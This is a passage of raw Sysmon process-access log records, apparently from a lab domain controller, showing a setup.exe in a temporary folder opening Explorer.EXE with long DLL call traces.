ppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015948Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015947Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015946Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015945Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015944Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015943Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015942Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015941Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015940Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015939Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015938Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015937Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.849{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015936Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015935Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015934Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015933Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015932Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015931Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.833{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C